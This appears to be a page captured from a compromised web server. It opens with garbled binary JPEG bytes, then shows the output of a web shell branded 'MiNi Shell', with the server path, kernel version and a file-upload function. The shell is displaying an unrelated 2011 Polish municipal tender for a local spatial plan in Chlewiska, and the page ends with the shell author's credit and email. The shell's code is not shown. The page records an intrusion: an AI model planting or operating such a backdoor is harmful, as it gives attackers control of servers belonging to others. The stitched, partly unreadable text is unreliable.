JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111107/368536-N-2011.html

<p class="kh_header"><b>Chlewiska: Opracowanie miejscowego planu zagospodarowania przestrzennego
dla obszaru miejscowości: Chlewiska, Wola Zagrodnia</b><br>
<b>Numer ogłoszenia: 368536 - 2011; data zamieszczenia: 07.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chlewiska , ul. Czachowskiego 49, 25-510 Chlewiska, woj. mazowieckie, tel. 48 6287054, faks 48 6287271.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie miejscowego planu zagospodarowania przestrzennego
dla obszaru miejscowości: Chlewiska, Wola Zagrodnia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji planistycznej 
w zakresie miejscowego planu zagospodarowania przestrzennego dla obszaru miejscowości: Chlewiska, Wola Zagrodnia, zwanego dalej Planem, (wg Wspólnego Słownika Zamówień (CPV): 71400000-2 Usługi architektoniczne dotyczące planowania przestrzennego i zagospodarowania terenu) oraz koordynowanie pełnej procedury zmierzającej do sporządzenia i uchwalenia Planu, udział w poszczególnych czynnościach, przygotowanie i prezentacja (w niezbędnym zakresie) wszelkich dokumentów związanych 
z przeprowadzeniem tej procedury, w tym uzyskanie wszelkich niezbędnych opinii 
i uzgodnień.

2.	Informacje ogólne o obszarze objętym planem:
a)	lokalizacja: wskazane w studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy obszary urbanizacji w sołectwach: Chlewiska, Wola Zagrodnia.
b)	powierzchnia: ok. 398 ha.
c)	orientacyjna liczba mieszkańców: 1430.

3.	Przedmiot zamówienia winien spełniać wymogi określone w:

a)	ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, z 2003 r. poz. 717 z późniejszymi zmianami);
b)	ustawie z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, z 2008 r. poz. 1227 z późniejszymi zmianami);
c)	rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z dnia 19 września 2003 r.);
d)	innych przepisach obowiązującego prawa, w zależności od przedmiotu regulacji planu.

4.	Ostateczna forma przedmiotu zamówienia obejmować będzie:
a)	tekst planu w formie uchwały wraz z załącznikami wymaganymi obowiązującym prawem;
b)	planszę rysunku planu w skali 1: 2000 wykonana w technice trwałej, odpowiedniej do zawieszenia na ścianie (np. wydruk laminowany);
c)	prognozę oddziaływania ustaleń Planu na środowisko przyrodnicze;
d)	prognozę skutków finansowych uchwalenia miejscowego planu zagospodarowania przestrzennego;
e)	wniosek o udzielenie przez odpowiednie organy zgody na przeznaczenie gruntów rolnych i/lub leśnych na cele nierolnicze i nieleśne, jeśli konieczność uzyskania takiej zgody wynikać będzie z uwarunkowań rozpoznanych przy sporządzania planu i z zaakceptowanych przez Zamawiającego ustaleń projektu Planu;
f)	dokumentację prac planistycznych.

5.	Na poszczególnych etapach opracowania Planu, Wykonawca zobowiązany będzie sporządzić:
a)	projekty pism formalno-prawnych, związanych z zawiadomieniem o przystąpieniu do sporządzania Planu (ponowienie procedury planistycznej w związku ze zmianą stanu prawnego);
b)	koncepcję Planu w formie tekstowej i graficznej, odpowiedniej do przedłożenia Zamawiającemu celem akceptacji założeń funkcjonalno-ekonomicznych planu do dalszego procedowania;
c)	projekt ustaleń Planu w formie tekstowej i graficznej, odpowiedniej do przeprowadzenia procedury opiniowania i uzgodnień, projekty: prognozy oddziaływania na środowisko oraz prognozy skutków finansowych realizacji Planu, projekty pism formalno-prawnych, związanych z trybem opiniowania i uzgadniania Planu wraz z prognozą oddziaływania na środowisko;
d)	wniosek o udzielenie przez odpowiednie organy zgody na przeznaczenie gruntów rolnych i/lub leśnych na cele nierolnicze i nieleśne, jeśli konieczność uzyskania takiej zgody wynikać będzie z uwarunkowań rozpoznanych przy sporządzania planu i z zaakceptowanych przez Zamawiającego ustaleń projektu Planu;
e)	ewentualne zmiany w projekcie Planu i prognoz, wynikające z uzyskanych uzgodnień i/lub opinii, projekty pism formalno-prawnych, związanych z trybem wyłożenia Planu do publicznego wglądu wraz z prognozami oddziaływania na środowisko i skutków finansowych oraz zbierania i rozpatrywania uwag do Planu i prognozy oddziaływania na środowisko;
f)	projekt ustaleń Planu w formie tekstowej i graficznej, odpowiedniej do przeprowadzenia procedury wyłożenia do publicznego wglądu;
g)	ewentualne zmiany w projekcie Planu i prognoz, wynikające z rozpatrzonych uwag, zgłoszonych w ramach procedury wyłożenia do publicznego wglądu, ewentualne projekty pism formalno-prawnych, związanych z ponowionym trybem uzgodnienia i opiniowania projektu Planu;
h)	projekt Planu w formie uchwały przeznaczonej do przedłożenia Radzie Gminy 
w celu uchwalenia wraz z ewentualną listą nieuwzględnionych uwag, o których mowa w art. 17 pkt 11 ustawy o planowaniu i zagospodarowaniu przestrzennym oraz projektami rozstrzygnięć, o których mowa w art. 20 ust. 1 ustawy 
o planowaniu i zagospodarowaniu przestrzennym;
i)	dokumentację trybu sporządzania projektu Planu w formie przeznaczonej do oceny zgodności z prawem;
j)	plan w formie ostatecznej.

6.	Wykonawca przekaże Zamawiającemu przedmiot zamówienia w następującej formie i liczbie egzemplarzy:
a)	projekty pism związanych z trybem formalno-prawnym sporządzania planu: w formie elektronicznej - pliki tekstowe zapisane na nośniku CD lub przesyłane pocztą elektroniczną oraz w formie wydruku - 1 egz. z przeznaczeniem do akt sprawy;
b)	koncepcję Planu w formie wydruku w 3 egz. oraz w formie elektronicznej, zapisanej na nośniku CD;
c)	projekt ustaleń Planu oraz prognozy oddziaływania ustaleń Planu na środowisko przyrodnicze w postaci odpowiedniej do przeprowadzenia procedury opiniowania i uzgodnień - w formie elektronicznej, zapisanej na nośnikach CD (pliki tekstowe lub w formacie PDF z ustaleniami części tekstowych projektu planu i prognozy oraz część graficzna w plikach PDF), w liczbie egzemplarzy odpowiedniej do przeprowadzenia procedury opiniowania i uzgodnień oraz w formie wydruku - 1 egz. z przeznaczeniem do akt sprawy;
d)	projekt ustaleń Planu oraz prognozy oddziaływania ustaleń Planu na środowisko przyrodnicze w postaci odpowiedniej do przeprowadzenia procedury wyłożenia do publicznego wglądu - w formie wydruku w 1 egz. oraz w formie elektronicznej, zapisanej na nośniku CD (pliki tekstowe lub w formacie PDF z ustaleniami części tekstowych projektu planu i prognoz finansowej i środowiskowej oraz część graficzna w plikach PDF);
e)	projekt Planu w formie uchwały przeznaczonej do przedłożenia Radzie Gminy 
w celu uchwalenia wraz z ewentualną listą nieuwzględnionych uwag, o których mowa w art. 17 pkt 11 ustawy o planowaniu i zagospodarowaniu przestrzennym oraz projektami rozstrzygnięć, o których mowa w art. 20 ust. 1 ustawy 
o planowaniu i zagospodarowaniu przestrzennym - w formie wydruku części tekstowej i graficznej (pomniejszonej do formatu maksimum A3) w 20 egz. w oraz w formie elektronicznej w formacie XML, zapisanej na nośniku CD;
f)	plan w formie ostatecznej - wydruk tekstu i rysunków planu w 5 egz., w tym jeden egzemplarz rysunku planu w technice trwałej: w formie planszy laminowanej lub podklejonej) oraz plan w formie elektronicznej (tekst z załącznikami w plikach tekstowych i/lub PDF), zapisanej na nośniku CD;
g)	dokumentacja trybu sporządzania projektu Planu w formie przeznaczonej do oceny zgodności z prawem - skompletowane oryginały dokumentów (1 egz.).

7.	Zakres prac nad projektem Planu, w zależności od wystąpienia zapotrzebowania zgłoszonego przez Zamawiającego, obejmuje także udział Wykonawcy w publicznej dyskusji nad rozwiązaniami planu, organizowanej podczas wyłożenia projektu Planu do publicznego wglądu - zgodnie z przepisami art. 17 pkt. 10 ustawy o planowaniu i zagospodarowaniu przestrzennym, dyskusjach właściwych komisji Rady Gminy, gminnej komisji urbanistyczno-architektonicznej i/lub udział w sesji Rady Gminy, na której rozpatrywany będzie projekt Planu przed jego uchwaleniem.

8.	Przedmiot zamówienia, określony powyżej, może zostać ograniczony na skutek ewentualnego pominięcia niektórych czynności, wynikającego z rozpoznania uwarunkowań prawnych, treści uzgodnień, opiniowania i/lub braku uwag do projektu Planu.

9.	Zamawiający nie podzielił zamówienia na poszczególne części i nie dopuszcza składania ofert częściowych.

10.	Zamawiający nie dopuszcza składania ofert wariantowych.

11.	Wykonawca jest zobowiązany wskazać w ofercie prace, których wykonanie zamierza ewentualnie powierzyć podwykonawcom.

12.	Materiały wstępne, zapewniane przez Zamawiającego:
a)	zaktualizowane studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy w formie elektronicznej.
b)	opracowanie ekofizjograficzne podstawowe dla obszaru gminy wykonane w roku 2009.
c)	dokumenty związane z dotychczasowym trybem procedury sporządzania Planu, w tym uchwały o przystąpieniu do jego sporządzania, ogłoszenia, obwieszczenia i zawiadomienia odpowiednich organów oraz wnioski do uwzględnienia w planie.
d)	mapy zasadnicze dla obszaru objętego planem, pochodzące z państwowego zasobu geodezyjnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do złożenia oferty - jeżeli oferty nie podpisał sam wykonawca a uprawnienie do podpisania oferty nie wynika wprost z innych dokumentów złożonych wraz z ofertą,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.chlewiska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzędzie Gminy Chlewiska w Chlewiskach ul. Czachowskiego 49, 26 - 510 Chlewiska pok. nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2011 godzina 10:00, miejsce: Urzędzie Gminy Chlewiska w Chlewiskach ul. Czachowskiego 49, pok. nr 7 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com